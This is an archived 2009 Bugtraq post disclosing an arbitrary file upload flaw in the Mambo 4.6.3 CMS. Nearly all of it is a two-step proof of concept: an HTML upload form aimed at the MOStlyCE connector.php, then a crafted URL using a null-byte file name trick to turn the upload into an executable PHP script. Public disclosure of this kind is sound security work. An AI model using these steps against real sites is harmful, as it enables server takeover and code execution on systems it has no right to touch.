| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sat, 19 Sep 2009 01:22:18 +0200 From: Paweł Łaskarzewski <kl3ryk@...il.com> To: bugtraq@...urityfocus.com Subject: Mambo 4.6.3 arbitrary file upload Step 1) Using post method send file to: http://victim.com/mambo4.6.5/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload file should have one of the following extensions: zip, doc, xls, pdf, rtf, csv, jpg, gif, jpeg, png, avi, mpg, mpeg, swf, fla POC: <form action="http://victim.com/mambo4.6.5/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload" method="post" enctype="multipart/form-data"> <input type="file" name="NewFile"></input> <input type="submit" value="submit"></input> </form> Step 2) Using known bug in this version of mambo rename that file. POC: http://victim.com/mambo4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload&file=a&file[NewFile][name]=myscript.php%00.jpg&file[NewFile][tmp_name]=/home/victim/victim.com/UserFiles/File/abc.gif&file[NewFile][size]=1&CurrentFolder= path to "UserFiles" you can get using another known bug which is described here: http://www.securityfocus.com/archive/1/archive/1/487128/100/200/threaded
Powered by blists - more mailing lists